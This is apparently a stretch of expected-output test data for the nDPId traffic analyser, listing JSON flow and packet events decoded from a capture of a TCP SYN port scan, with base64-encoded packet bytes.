+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAso8IAACoGerCsEAAIQA2GNIzTJATdU4MZAAAAAGACDAAIiAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpQAADUG6N6sEAAIQA2GNIzTBJHdU4MZAAAAAGACCAAr+wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsqggAADYGaGqsEAAIQA2GNIzTKUbdU4MZAAAAAGACDAADRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsvOQAACoGYY6sEAAIQA2GNIzTBuHdU4MZAAAAAGACDAAlqwAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNoAADYG\/ZisEAAIQA2GNIzTAAPdU4MZAAAAAGACDAAsiQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKEAAC8GrNGsEAAIQA2GNIzTBSrdU4MZAAAAAGACEAAjYgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsohQAACYGgF6sEAAIQA2GNIzTIAHdU4MZAAAAAGACDAAMiwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsrJgAADMGaNqsEAAIQA2GNIzTEdfdU4MZAAAAAGACEAAWtQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsOqsAADkG1MesEAAIQA2GNIzTTj\/dU4MZAAAAAGACCADiTAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsfAoAACkGo2isEAAIQA2GNIzTJxDdU4MZAAAAAGACCAAJfAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAADoGDTOsEAAIQA2GNIzTJMrdU4MZAAAAAGACDAAHwgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsEygAADoG+0qsEAAIQA2GNIzTBrfdU4MZAAAAAGACDAAl1QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsokMAADcGby+sEAAIQA2GNIzTCPDdU4MZAAAAAGACEAAfnAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6UAAC0GU82sEAAIQA2GNIzTFxLdU4MZAAAAAGACCAAZegAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsiMQAADcGiK6sEAAIQA2GNIzSG7zdUoMYAAAAAGACEAAM0wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfcAADsGb3usEAAIQA2GNIzSDwvdUoMYAAAAAGACEAAZhAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAspuwAAC8GcoasEAAIQA2GNIzSJ8TdUoMYAAAAAGACEAAAywAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAszy0AACkGUEWsEAAIQA2GNIzSG1ndUoMYAAAAAGACCAAVNgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsh1cAADAGkRusEAAIQA2GNIzSEWHdUoMYAAAAAGACBAAjLgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswFUAACcGYR2sEAAIQA2GNIzS1DjdUoMYAAAAAGACEABUVgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACoGCumsEAAIQA2GNIzSAFPdUoMYAAAAAGACDAAsPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SUAACkGQk2sEAAIQA2GNIzSBR3dUoMYAAAAAGACCAArcgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsDlsAADMGBxisEAAIQA2GNIzSH0ndUoMYAAAAAGACEAAJRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswGIAADAGWBCsEAAIQA2GNIzSEPfdUoMYAAAAAGACBAAjmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsercAADEGnLusEAAIQA2GNIzSI1rdUoMYAAAAAGACCAANNQAAAgQFtA=="} 